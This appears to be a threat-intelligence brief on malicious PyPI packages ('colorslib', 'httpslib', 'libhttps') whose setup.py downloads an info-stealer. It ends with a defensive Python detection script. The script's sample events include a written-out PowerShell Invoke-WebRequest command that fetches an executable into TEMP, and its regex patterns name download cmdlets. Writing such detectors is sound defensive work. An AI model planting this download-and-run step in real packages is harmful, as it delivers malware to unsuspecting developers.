PyPI Author 'Lolip0p' Distributes Info-stealing Malware
Category: Malware Campaign | Industry: Global | Level: Tactical | Source: Fortinet
Threat actors continue to turn to the PyPI (Python Package Index) repository as a distribution channel for their malware. Researchers from FortiGuard Labs discovered that an author named 'Lolip0p' uploaded three Python packages, published as early as January 7th, 2023, under the project names "colorslib", "httpslib" and "libhttps" to distribute information-stealing malware. "The author also positions each package as legitimate and clean by including a convincing project description. However, these packages download and run a malicious binary executable." When installed, each package's 'setup.py' script runs a PowerShell Invoke-WebRequest command to download the malicious executable from Dropbox. The executable then drops additional payloads and runs them from the host's TEMP folder. As of January 17th, 2023, vendor detection in VirusTotal for the malicious executable files ranges between 30% and 42%, while the detection score for the Dropbox link is low, at 9/90.
- Malicious Script/Package Installs Malware
Anvilogic Use Cases:
- Package installation
- Access Common Package Config file
- Executable Process from Suspicious Folder
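The install chain described above (setup.py spawning a PowerShell download, then an executable launched from TEMP) maps directly onto the "Package installation" and "Executable Process from Suspicious Folder" use cases. The following is an added detection example, not code from Fortinet or Anvilogic; the process-creation events, field names, paths and the Dropbox URL placeholder are all constructed for illustration.

```python
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# Constructed sample process-creation events (not taken from the Fortinet
# report): pip runs setup.py, setup.py spawns PowerShell to fetch a binary
# from a file-sharing URL into TEMP, and the binary is then executed.
SAMPLE_EVENTS: List[Event] = [
    {"pid": "100", "ppid": "1", "image": r"C:\Python311\python.exe",
     "cmdline": "python.exe -m pip install colorslib"},
    {"pid": "101", "ppid": "100", "image": r"C:\Python311\python.exe",
     "cmdline": "python.exe setup.py install"},
    {"pid": "102", "ppid": "101",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -Command Invoke-WebRequest -Uri "
                "https://www.dropbox.com/s/PLACEHOLDER/update.exe "
                r"-OutFile $env:TEMP\update.exe"},
    {"pid": "103", "ppid": "102",
     "image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "cmdline": "update.exe"},
    {"pid": "200", "ppid": "1", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

# Image name of a Python or pip process, i.e. a package's setup.py running.
PY_INSTALLER = re.compile(r"\\(?:python[\d.]*|pip[\d.]*)\.exe$", re.I)
# Common PowerShell download primitives seen on the command line.
DOWNLOADER = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|start-bitstransfer", re.I)
# An executable whose image path sits directly in a Temp/Tmp folder.
TEMP_IMAGE = re.compile(r"\\(?:Temp|Tmp)\\[^\\]+\.exe$", re.I)


def detect(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule_name, pid) pairs for events matching the install chain."""
    by_pid = {e["pid"]: e for e in events}
    hits: List[Tuple[str, str]] = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        # Rule 1: Python/pip parent spawns PowerShell with a download cmdlet.
        if (parent is not None and PY_INSTALLER.search(parent["image"])
                and "powershell" in e["image"].lower()
                and DOWNLOADER.search(e["cmdline"])):
            hits.append(("python_spawns_powershell_download", e["pid"]))
        # Rule 2: an executable is launched from a TEMP folder.
        if TEMP_IMAGE.search(e["image"]):
            hits.append(("executable_from_temp_folder", e["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Rule 1 keys on the parent-child relationship rather than on the Dropbox URL, so it still fires when the hosting location changes; Rule 2 is noisier on its own and is best correlated with Rule 1 or with a recent package install on the same host.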